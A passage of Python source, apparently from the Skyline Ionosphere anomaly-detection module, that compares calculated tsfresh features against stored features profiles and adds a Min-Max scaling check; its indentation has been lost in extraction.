logger.info('using fp id %s matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
else:
# @added 20170116 - Feature #1854: Ionosphere learn - generations
# If this is added_by ionosphere_learn the id is only
# added if the use_full_duration_days features profile
# is less than max_generations as if it is at the max
# then a new features profile cannot be created from it
# even if it is were to match. Ionosphere learn is
# limited here on generation.
# Set the default as max e.g. not allowed
current_fp_generation = int(metric_max_generations)
try:
current_fp_generation = row['generation']
if int(current_fp_generation) < int(metric_max_generations):
fp_ids.append(int(fp_id))
logger.info(
'valid ionosphere_learn generation %s - fp id %s matched full_duration %s - %s' % (
str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
else:
logger.info(
'ionosphere_learn cannot check due to max_generations of %s would be exceeded, current generation %s - fp id %s matched full_duration %s - %s' % (
str(metric_max_generations), str(current_fp_generation), str(fp_id),
str(full_duration), base_name))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: ionosphere_learn check could not determine the fp generation of fp id %s from the row object for %s' % (
str(fp_id), base_name))
else:
logger.info('not using fp id %s not matched full_duration %s - %s' % (str(fp_id), str(full_duration), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Create the fp_ids_db_object so it is available throughout
# Here we go! Learn!
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# fp_ids_db_object = row
connection.close()
fp_count = len(fp_ids)
logger.info('determined %s fp ids for %s' % (str(fp_count), base_name))
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = len(fp_layers_ids)
logger.info('determined %s layers ids for %s' % (str(fp_layers_count), base_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine fp ids from DB for %s' % base_name)
fp_count = 0
# @added 20170309 - Feature #1960: ionosphere_layers
fp_layers_count = 0
# @added 20170306 - Feature #1960: ionosphere_layers
# Corrected the interpolation of the fp_ids_db_object above where it
# was set to the last row only, however it was not used anyway.
# Here we go, let us TEACH you properly. We only evaluate
# @modified 20170308 - Feature #1960: ionosphere_layers
# Not currently used - fp_ids_db_object
# if result:
# fp_ids_db_object = result
if len(fp_ids) == 0:
logger.info('there are no fp ids that match full duration for %s' % base_name)
else:
fp_ids_found = True
if not fp_ids_found:
logger.info('no fp ids were found for %s at %s' % (base_name, str(full_duration)))
# @modified 20170108 - Feature #1842: Ionosphere - Graphite now graphs
# Use all_fp_ids so that we can handle multiple durations
# fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if len(all_fp_ids) == 0:
logger.error('error :: Ionosphere is enabled on %s but has no feature_profiles' % (base_name))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
else:
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20161221 - TODO: why not calculate the features of every
        # anomaly so the user does not have to do it and wait for the
# features to be calculated.
# Check the features were calculated by the webapp
calculated_feature_file = '%s/%s.tsfresh.input.csv.features.transposed.csv' % (metric_training_data_dir, base_name)
calculated_feature_file_found = False
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# ionosphere_learn should always provide the features profile csv
# Ionosphere does not create features profiles for learn, it only
# checks them.
# Here we go! Learn!
if added_by == 'ionosphere_learn':
if not calculated_feature_file_found:
logger.error('error :: no ionosphere_learn calculated_feature_file file found - %s' % calculated_feature_file)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
if training_metric:
                # Allow time for the Graphite alert resources to be created; if they
                # are not present an alert was not sent, therefore features do not
                # need to be calculated
check_time = int(time())
check_age = check_time - int(added_at)
if check_age < 5:
sleep(5)
graphite_file_count = len([f for f in os.listdir(metric_training_data_dir)
if f.endswith('.png') and
os.path.isfile(os.path.join(metric_training_data_dir, f))])
if graphite_file_count == 0:
logger.info('not calculating features no anomaly Graphite alert resources created in %s' % (metric_training_data_dir))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('anomaly Graphite alert resources found in %s' % (metric_training_data_dir))
context = skyline_app
f_calc = None
if not calculated_feature_file_found:
try:
fp_csv, successful, fp_exists, fp_id, log_msg, traceback_format_exc, f_calc = calculate_features_profile(skyline_app, metric_timestamp, base_name, context)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate features')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
if os.path.isfile(calculated_feature_file):
logger.info('calculated features available - %s' % (calculated_feature_file))
calculated_feature_file_found = True
if f_calc:
send_metric_name = '%s.features_calculation_time' % skyline_app_graphite_namespace
f_calc_time = '%.2f' % float(f_calc)
try:
send_graphite_metric(skyline_app, send_metric_name, f_calc_time)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send the features calculation time to Graphite')
if training_metric:
logger.info('training metric done')
self.remove_metric_check_file(str(metric_check_file))
# TODO: make ionosphere more useful, compare any other
# available training_metric profiles here and match, not in the
# db context, in the training context.
if engine:
engine_disposal(engine)
return
if not calculated_feature_file_found:
logger.error('error :: calculated features file not available - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20161213 - Branch #1790: test_tsfresh
# TODO: Match the test_tsfresh method
# Create an array of the calculated features
calculated_features = []
if calculated_feature_file_found:
count_id = 0
with open(calculated_feature_file, 'rb') as fr:
reader = csv.reader(fr, delimiter=',')
for i, line in enumerate(reader):
if str(line[0]) != '':
if ',' in line[0]:
feature_name = '"%s"' % str(line[0])
else:
feature_name = str(line[0])
count_id += 1
calc_value = float(line[1])
calculated_features.append([feature_name, calc_value])
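# Note: the transposed features csv read above is expected to contain one
# '<feature_name>,<value>' row per tsfresh feature, e.g. (illustrative):
# value__mean,123.456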
if len(calculated_features) == 0:
logger.error('error :: no calculated features were determined from - %s' % (calculated_feature_file))
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked = 0
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked = 0
layers_checked_count = 0
# Compare calculated features to feature values for each fp id
not_anomalous = False
if calculated_feature_file_found:
for fp_id in fp_ids:
if not metrics_id:
logger.error('error :: metric id not known')
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
if engine:
engine_disposal(engine)
return False
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
fp_checked += 1
self.features_profiles_checked.append(fp_id)
features_count = None
fp_features = []
# Get features for fp_id from z_fp_<metric_id> table where the
# features profile is the same full_duration
metric_fp_table = 'z_fp_%s' % str(metrics_id)
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine for feature_id and values from %s' % metric_fp_table)
if not engine:
logger.error('error :: engine not obtained for feature_id and values from %s' % metric_fp_table)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
# First check to determine if the fp_id has data in memcache
# before querying the database
fp_id_feature_values = None
if settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
fp_id_feature_values = self.memcache_client.get(fp_id_feature_values_key)
# if memcache does not have the key the response to the
# client is None, it does not raise an exception
except:
logger.error('error :: failed to get %s from memcache' % fp_id_feature_values_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if fp_id_feature_values:
fp_features = literal_eval(fp_id_feature_values)
logger.info('using memcache %s key data' % fp_id_feature_values_key)
if not fp_features:
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT feature_id, value FROM %s WHERE fp_id=%s' % (metric_fp_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_feature_id = int(row['feature_id'])
fp_value = float(row['value'])
fp_features.append([fp_feature_id, fp_value])
connection.close()
features_count = len(fp_features)
logger.info('determined %s features for fp_id %s' % (str(features_count), str(fp_id)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine feature_id, value from %s' % metric_fp_table)
if fp_features and settings.MEMCACHE_ENABLED:
fp_id_feature_values_key = 'fp.id.%s.feature.values' % str(fp_id)
try:
self.memcache_client.set(fp_id_feature_values_key, fp_features)
logger.info('populated memcache %s key' % fp_id_feature_values_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_feature_values_key)
# @added 20170809 - Task #2132: Optimise Ionosphere DB usage
if settings.MEMCACHE_ENABLED:
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# @added 20170107 - Feature #1852: Ionosphere - features_profile matched graphite graphs
# Feature #1844: ionosphere_matched DB table
# Added the calculated features sum for verification purposes
all_calc_features_sum_list = []
for feature_name, calc_value in calculated_features:
all_calc_features_sum_list.append(float(calc_value))
all_calc_features_sum = sum(all_calc_features_sum_list)
# Convert feature names in calculated_features to their id
logger.info('converting tsfresh feature names to Skyline feature ids')
calc_features_by_id = []
for feature_name, calc_value in calculated_features:
for skyline_feature_id, name in TSFRESH_FEATURES:
if feature_name == name:
calc_features_by_id.append([skyline_feature_id, float(calc_value)])
# Determine what features each data has, extract only values for
# common features.
logger.info('determining common features')
relevant_fp_feature_values = []
relevant_calc_feature_values = []
for skyline_feature_id, calc_value in calc_features_by_id:
for fp_feature_id, fp_value in fp_features:
if skyline_feature_id == fp_feature_id:
relevant_fp_feature_values.append(fp_value)
relevant_calc_feature_values.append(calc_value)
# Determine the sum of each set
relevant_fp_feature_values_count = len(relevant_fp_feature_values)
relevant_calc_feature_values_count = len(relevant_calc_feature_values)
if relevant_fp_feature_values_count != relevant_calc_feature_values_count:
logger.error('error :: mismatch in number of common features')
logger.error('error :: relevant_fp_feature_values_count - %s' % str(relevant_fp_feature_values_count))
logger.error('error :: relevant_calc_feature_values_count - %s' % str(relevant_calc_feature_values_count))
continue
else:
logger.info('comparing on %s common features' % str(relevant_fp_feature_values_count))
if relevant_fp_feature_values_count == 0:
logger.error('error :: relevant_fp_feature_values_count is zero')
continue
# Determine the sum of each set
sum_fp_values = sum(relevant_fp_feature_values)
sum_calc_values = sum(relevant_calc_feature_values)
logger.info(
'sum of the values of the %s common features in features profile - %s' % (
str(relevant_fp_feature_values_count), str(sum_fp_values)))
logger.info(
'sum of the values of the %s common features in the calculated features - %s' % (
str(relevant_calc_feature_values_count), str(sum_calc_values)))
# Determine whether each set is positive or negative
# # if the same carry on
# # if both negative, make them both positive
# Sum fp values, Sum calculated - handle negatives like features_sum :: -3389570699080000.0000000000
fp_sum_array = [sum_fp_values]
calc_sum_array = [sum_calc_values]
percent_different = 100
sums_array = np.array([sum_fp_values, sum_calc_values], dtype=float)
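# The try below computes the percent difference as
# np.diff(sums_array) / sums_array[:-1] * 100, i.e. the change in the
# calculated sum relative to the features profile sum. Worked example
# (illustrative values): sums_array = [100.0, 101.5] -> np.diff = [1.5]
# -> (1.5 / 100.0) * 100 = 1.5 percent different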
try:
calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
percent_different = calc_percent_different[0]
logger.info('percent_different between common features sums - %s' % str(percent_different))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate percent_different')
continue
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
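# np.testing.assert_array_almost_equal raises an AssertionError when the
# arrays differ beyond (by default) 6 decimal places, which is why it is
# wrapped in try/except and simply flags almost_equal True or False here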
if almost_equal:
not_anomalous = True
# @modified 20170118 - Bug #1860: Debug learn not matched in ionosphere
# This broke it, no variable was interpolated
# logger.info('common features sums are almost equal, not anomalous' % str(relevant_fp_feature_values_count))
logger.info('common features sums are almost equal, not anomalous')
# @added 20161229 - Feature #1830: Ionosphere alerts
# Update the features profile checked count and time
logger.info('updating checked details in db for %s' % (str(fp_id)))
# update matched_count in ionosphere_table
checked_timestamp = int(time())
# @added 20170804 - Bug #2130: MySQL - Aborted_clients
# Set a conditional here to only get_an_engine if no engine, this
# is probably responsible for the Aborted_clients, as it would have
# left the acquired engine orphaned
# Testing on skyline-dev-3-40g-gra1 Fri Aug 4 16:08:14 UTC 2017
if not engine:
try:
engine, log_msg, trace = get_an_engine()
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get a MySQL engine to update checked details in db for %s' % (str(fp_id)))
if not engine:
logger.error('error :: engine not obtained to update checked details in db for %s' % (str(fp_id)))
try:
connection = engine.connect()
connection.execute(
ionosphere_table.update(
ionosphere_table.c.id == fp_id).
values(checked_count=ionosphere_table.c.checked_count + 1,
last_checked=checked_timestamp))
connection.close()
logger.info('updated checked_count for %s' % str(fp_id))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not update checked_count and last_checked for %s ' % str(fp_id))
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
not_anomalous = True
# log
logger.info('not anomalous - features profile match - %s' % base_name)
logger.info(
'calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
(str(settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR),
str(fp_id), str(percent_different)))
# @added 20180617 - Feature #2404: Ionosphere - fluid approximation
# Now if not matched use Min-Max scaling as per
# http://sebastianraschka.com/Articles/2014_about_feature_scaling.html#numpy
# Min-Max scale the fp time series z_ts_<metric_id> SELECT WHERE fp_id
# or from memcache to create minmax_fp_ts
# Min-Max scale the current time series to create minmax_anomalous_ts
# Create features profiles for minmax_fp_ts
# Create features profiles for minmax_anomalous_ts
try:
minmax_scaling_enabled = settings.IONOSPHERE_MINMAX_SCALING_ENABLED
except:
minmax_scaling_enabled = False
minmax_not_anomalous = False
minmax_check = False
minmax = 0
if not not_anomalous:
if minmax_scaling_enabled:
minmax_check = True
if added_by == 'ionosphere_learn' and minmax_check:
minmax_check = False
logger.info('ionosphere_learn job not minmax scaling')
if minmax_check:
logger.info('running minmax scaling')
# First check to determine if the z_ts_<metric_id> for the fp
# has data in memcache before querying the database
metric_fp_ts_table = 'z_ts_%s' % str(metrics_id)
fp_id_metric_ts = []
if settings.MEMCACHE_ENABLED:
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
fp_id_metric_ts_object = self.memcache_client.get(fp_id_metric_ts_key)
# if memcache does not have the key the response to the
# client is None, it does not raise an exception
except:
logger.error('error :: failed to get %s from memcache' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
if fp_id_metric_ts_object:
fp_id_metric_ts = literal_eval(fp_id_metric_ts_object)
logger.info('used memcache %s key data to populate fp_id_metric_ts with %s data points' % (fp_id_metric_ts_key, str(len(fp_id_metric_ts))))
else:
logger.info('no memcache %s key data, will use database' % fp_id_metric_ts_key)
if not fp_id_metric_ts:
if LOCAL_DEBUG:
logger.debug('debug :: getting data from %s database table for fp id %s to populate the fp_id_metric_ts list' % (metric_fp_ts_table, str(fp_id)))
try:
stmt = 'SELECT timestamp, value FROM %s WHERE fp_id=%s' % (metric_fp_ts_table, str(fp_id)) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
fp_id_ts_timestamp = int(row['timestamp'])
fp_id_ts_value = float(row['value'])
fp_id_metric_ts.append([fp_id_ts_timestamp, fp_id_ts_value])
connection.close()
values_count = len(fp_id_metric_ts)
logger.info('determined %s values for the fp_id time series %s for %s' % (str(values_count), str(fp_id), str(base_name)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine timestamps and values from %s' % metric_fp_ts_table)
if fp_id_metric_ts and settings.MEMCACHE_ENABLED:
fp_id_metric_ts_key = 'fp.%s.%s.ts' % (str(fp_id), str(metrics_id))
try:
self.memcache_client.set(fp_id_metric_ts_key, fp_id_metric_ts)
logger.info('populated memcache %s key' % fp_id_metric_ts_key)
except:
logger.error('error :: failed to set %s in memcache' % fp_id_metric_ts_key)
try:
self.memcache_client.close()
except:
logger.error('error :: failed to close memcache_client')
# Get anomalous time series
anomalous_ts_values_count = 0
if fp_id_metric_ts:
anomalous_timeseries_not_defined = True
try:
test_anomalous_timeseries = anomalous_timeseries
if len(test_anomalous_timeseries) > 0:
anomalous_timeseries_not_defined = False
except:
logger.info('anomalous_timeseries is not defined, loading from anomaly json')
timeseries_dir = base_name.replace('.', '/')
metric_data_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, metric_timestamp,
timeseries_dir)
anomaly_json = '%s/%s.json' % (metric_data_dir, base_name)
if anomalous_timeseries_not_defined:
try:
with open((anomaly_json), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
anomalous_timeseries = literal_eval(timeseries_array_str)
if len(anomalous_timeseries) > 0:
logger.info('anomalous_timeseries was populated from anomaly json %s with %s data points for creating the minmax_anomalous_ts' % (anomaly_json, str(len(anomalous_timeseries))))
else:
logger.error('error :: anomalous_timeseries for minmax_anomalous_ts is not populated from anomaly json - %s' % anomaly_json)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not create anomalous_timeseries from anomaly json %s' % anomaly_json)
else:
logger.info('anomalous_timeseries has %s data points for creating the minmax_anomalous_ts' % (str(len(anomalous_timeseries))))
anomalous_ts_values_count = len(anomalous_timeseries)
# @added 20180621 - Feature #2404: Ionosphere - fluid approximation
# Check ranges and only Min-Max scale if the 2 time series
# are similar in range
# @added 20180819 - Bug #2534: Ionosphere - fluid approximation - IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE on low ranges
# TODO
try:
range_tolerance = settings.IONOSPHERE_MINMAX_SCALING_RANGE_TOLERANCE
except:
range_tolerance = 0.15
range_tolerance_percentage = range_tolerance * 100
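# Worked example of the tolerance check below (illustrative values): with
# range_tolerance = 0.15 and min_fp_value = 200, the accepted window is
# range(int(200 - 30), int(200 + 30)) = range(170, 230), so an anomalous
# min of 170..229 is considered similar (range() excludes the upper bound)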
check_range = False
range_similar = False
if fp_id_metric_ts:
if anomalous_ts_values_count > 0:
check_range = True
lower_range_similar = False
upper_range_similar = False
if check_range:
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
min_fp_value = min(minmax_fp_values)
max_fp_value = max(minmax_fp_values)
except:
min_fp_value = False
max_fp_value = False
try:
minmax_anomalous_values = [x2[1] for x2 in anomalous_timeseries]
min_anomalous_value = min(minmax_anomalous_values)
max_anomalous_value = max(minmax_anomalous_values)
except:
min_anomalous_value = False
max_anomalous_value = False
lower_range_not_same = True
try:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_not_same = False
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
except:
lower_range_not_same = True
if min_fp_value and min_anomalous_value and lower_range_not_same:
if int(min_fp_value) == int(min_anomalous_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(min_fp_value), str(min_anomalous_value)))
else:
lower_min_fp_value = int(min_fp_value - (min_fp_value * range_tolerance))
upper_min_fp_value = int(min_fp_value + (min_fp_value * range_tolerance))
if int(min_anomalous_value) in range(lower_min_fp_value, upper_min_fp_value):
lower_range_similar = True
logger.info('min value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(min_fp_value),
str(min_anomalous_value),
str(range_tolerance_percentage)))
if not lower_range_similar:
logger.info('lower range of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(min_fp_value), str(min_anomalous_value)))
upper_range_not_same = True
try:
if int(max_fp_value) == int(max_anomalous_value):
upper_range_not_same = False
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are the same' % (
str(max_fp_value), str(max_anomalous_value)))
except:
upper_range_not_same = True
if max_fp_value and max_anomalous_value and lower_range_similar and upper_range_not_same:
# @added 20180717 - Task #2446: Optimize Ionosphere
# Feature #2404: Ionosphere - fluid approximation
# On low values such as 1 and 2, the range_tolerance
# should be adjusted to account for the very small
# range. TODO
lower_max_fp_value = int(max_fp_value - (max_fp_value * range_tolerance))
upper_max_fp_value = int(max_fp_value + (max_fp_value * range_tolerance))
if int(max_anomalous_value) in range(lower_max_fp_value, upper_max_fp_value):
upper_range_similar = True
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are similar within %s percent of each other' % (
str(max_fp_value), str(max_anomalous_value),
str(range_tolerance_percentage)))
else:
logger.info('max value of fp_id_metric_ts (%s) and anomalous_timeseries (%s) are not similar' % (
str(max_fp_value), str(max_anomalous_value)))
if lower_range_similar and upper_range_similar:
range_similar = True
else:
logger.info('the ranges of fp_id_metric_ts and anomalous_timeseries differ significantly, Min-Max scaling will be skipped')
minmax_fp_ts = []
# if fp_id_metric_ts:
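# Min-Max scaling sketch: each series is rescaled to [0, 1] with
# x_scaled = (x - min(x)) / (max(x) - min(x)), e.g. (illustrative)
# [2, 4, 6] -> [0.0, 0.5, 1.0], so the two series can be compared on
# shape rather than absolute magnitude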
if range_similar:
if LOCAL_DEBUG:
logger.debug('debug :: creating minmax_fp_ts from minmax scaled fp_id_metric_ts')
try:
minmax_fp_values = [x[1] for x in fp_id_metric_ts]
x_np = np.asarray(minmax_fp_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_fp_ts.append([ts[0], v])
logger.info('minmax_fp_ts list populated with the minmax scaled time series with %s data points' % str(len(minmax_fp_ts)))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not minmax scale fp id %s time series for %s' % (str(fp_id), str(base_name)))
if not minmax_fp_ts:
logger.error('error :: minmax_fp_ts list not populated')
minmax_anomalous_ts = []
if minmax_fp_ts:
# Only process if they are approximately the same length
minmax_fp_ts_values_count = len(minmax_fp_ts)
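# Note: range(-14, 14) accepts length differences from -14 up to 13 data
# points, i.e. the two series must be of approximately the same length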
if minmax_fp_ts_values_count - anomalous_ts_values_count in range(-14, 14):
try:
minmax_anomalous_values = [x2[1] for x2 in anomalous_timeseries]
x_np = np.asarray(minmax_anomalous_values)
# Min-Max scaling
np_minmax = (x_np - x_np.min()) / (x_np.max() - x_np.min())
for (ts, v) in zip(fp_id_metric_ts, np_minmax):
minmax_anomalous_ts.append([ts[0], v])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not minmax scale current time series anomalous_timeseries for fp id %s - %s' % (str(fp_id), str(base_name)))
if len(minmax_anomalous_ts) > 0:
logger.info('minmax_anomalous_ts is populated with %s data points' % str(len(minmax_anomalous_ts)))
else:
logger.error('error :: minmax_anomalous_ts is not populated')
else:
logger.info('minmax scaled check will be skipped - anomalous_ts_values_count is %s and minmax_fp_ts is %s' % (str(anomalous_ts_values_count), str(minmax_fp_ts_values_count)))
minmax_fp_ts_csv = '%s/fpid.%s.%s.minmax_fp_ts.tsfresh.input.std.csv' % (
settings.SKYLINE_TMP_DIR, str(fp_id), base_name)
minmax_fp_fname_out = minmax_fp_ts_csv + '.transposed.csv'
anomalous_ts_csv = '%s/%s.%s.minmax_anomalous_ts.tsfresh.std.csv' % (
settings.SKYLINE_TMP_DIR, metric_timestamp, base_name)
anomalous_fp_fname_out = anomalous_ts_csv + '.transposed.csv'
tsf_settings = ReasonableFeatureExtractionSettings()
tsf_settings.disable_progressbar = True
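# The tsfresh extraction below expects a long-format data frame with
# 'metric', 'timestamp' and 'value' columns (column_id='metric',
# column_sort='timestamp'); this assumes the older tsfresh API in use
# here, where the settings object is passed via the
# feature_extraction_settings keyword with the progress bar disabled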
minmax_fp_features_sum = None
minmax_anomalous_features_sum = None
# Initialise the counts too so later references do not raise a NameError
minmax_fp_features_count = 0
minmax_anomalous_features_count = 0
if minmax_anomalous_ts and minmax_fp_ts:
if LOCAL_DEBUG:
logger.debug('debug :: analyzing minmax_fp_ts and minmax_anomalous_ts')
if not os.path.isfile(minmax_fp_ts_csv):
if LOCAL_DEBUG:
logger.debug('debug :: creating %s from minmax_fp_ts' % minmax_fp_ts_csv)
datapoints = minmax_fp_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
except: # nosec
continue
if LOCAL_DEBUG:
if len(converted) > 0:
logger.debug('debug :: converted is populated')
else:
logger.debug('debug :: error :: converted is not populated')
for ts, value in converted:
try:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(minmax_fp_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not write to file %s' % (str(minmax_fp_ts_csv)))
else:
logger.info('file found %s, using for data' % minmax_fp_ts_csv)
if not os.path.isfile(minmax_fp_ts_csv):
logger.error('error :: file not found %s' % minmax_fp_ts_csv)
else:
logger.info('file exists to create the minmax_fp_ts data frame from - %s' % minmax_fp_ts_csv)
try:
df = pd.read_csv(minmax_fp_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create data frame from %s' % (str(minmax_fp_ts_csv)))
try:
df_features = extract_features(
df, column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, feature_extraction_settings=tsf_settings)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create df_features from %s' % (str(minmax_fp_ts_csv)))
# Create transposed features csv
if not os.path.isfile(minmax_fp_fname_out):
# Transpose
df_t = df_features.transpose()
df_t.to_csv(minmax_fp_fname_out)
else:
if LOCAL_DEBUG:
logger.debug('debug :: file exists - %s' % minmax_fp_fname_out)
try:
# Calculate the count and sum of the features values
df_sum = pd.read_csv(
minmax_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum.columns = ['feature_name', 'value']
df_sum['feature_name'] = df_sum['feature_name'].astype(str)
df_sum['value'] = df_sum['value'].astype(float)
minmax_fp_features_count = len(df_sum['value'])
minmax_fp_features_sum = df_sum['value'].sum()
logger.info('minmax_fp_ts - features_count: %s, features_sum: %s' % (str(minmax_fp_features_count), str(minmax_fp_features_sum)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create df_sum from %s' % (str(minmax_fp_fname_out)))
if minmax_fp_features_count > 0:
if LOCAL_DEBUG:
logger.debug('debug :: minmax_fp_features_count of the minmax_fp_ts is %s' % str(minmax_fp_features_count))
else:
logger.error('error :: minmax_fp_features_count is %s' % str(minmax_fp_features_count))
if not os.path.isfile(anomalous_ts_csv):
datapoints = minmax_anomalous_ts
converted = []
for datapoint in datapoints:
try:
new_datapoint = [float(datapoint[0]), float(datapoint[1])]
converted.append(new_datapoint)
except: # nosec
continue
for ts, value in converted:
utc_ts_line = '%s,%s,%s\n' % (base_name, str(int(ts)), str(value))
with open(anomalous_ts_csv, 'a') as fh:
fh.write(utc_ts_line)
df = pd.read_csv(anomalous_ts_csv, delimiter=',', header=None, names=['metric', 'timestamp', 'value'])
df.columns = ['metric', 'timestamp', 'value']
df_features_current = extract_features(
df, column_id='metric', column_sort='timestamp', column_kind=None,
column_value=None, feature_extraction_settings=tsf_settings)
# Create transposed features csv
if not os.path.isfile(anomalous_fp_fname_out):
# Transpose
df_t = df_features_current.transpose()
df_t.to_csv(anomalous_fp_fname_out)
# Calculate the count and sum of the features values
df_sum_2 = pd.read_csv(
anomalous_fp_fname_out, delimiter=',', header=0,
names=['feature_name', 'value'])
df_sum_2.columns = ['feature_name', 'value']
df_sum_2['feature_name'] = df_sum_2['feature_name'].astype(str)
df_sum_2['value'] = df_sum_2['value'].astype(float)
minmax_anomalous_features_count = len(df_sum_2['value'])
minmax_anomalous_features_sum = df_sum_2['value'].sum()
logger.info('minmax_anomalous_ts - minmax_anomalous_features_count: %s, minmax_anomalous_features_sum: %s' % (
str(minmax_anomalous_features_count),
str(minmax_anomalous_features_sum)))
if minmax_fp_features_sum and minmax_anomalous_features_sum:
percent_different = None
try:
fp_sum_array = [minmax_fp_features_sum]
calc_sum_array = [minmax_anomalous_features_sum]
percent_different = 100
sums_array = np.array([minmax_fp_features_sum, minmax_anomalous_features_sum], dtype=float)
calc_percent_different = np.diff(sums_array) / sums_array[:-1] * 100.
percent_different = calc_percent_different[0]
logger.info('percent_different between minmax scaled features sums - %s' % str(percent_different))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate percent_different from minmax scaled features sums')
if percent_different:
almost_equal = None
try:
np.testing.assert_array_almost_equal(fp_sum_array, calc_sum_array)
almost_equal = True
except:
almost_equal = False
if almost_equal:
minmax_not_anomalous = True
logger.info('minmax scaled common features sums are almost equal, not anomalous')
# if diff_in_sums <= 1%:
if percent_different < 0:
new_pdiff = percent_different * -1
percent_different = new_pdiff
if percent_different < settings.IONOSPHERE_FEATURES_PERCENT_SIMILAR:
minmax_not_anomalous = True
# log
logger.info('not anomalous - minmax scaled features profile match - %s - %s' % (base_name, str(minmax_not_anomalous)))
logger.info(
'minmax scaled calculated features sum are within %s percent of fp_id %s with %s, not anomalous' %
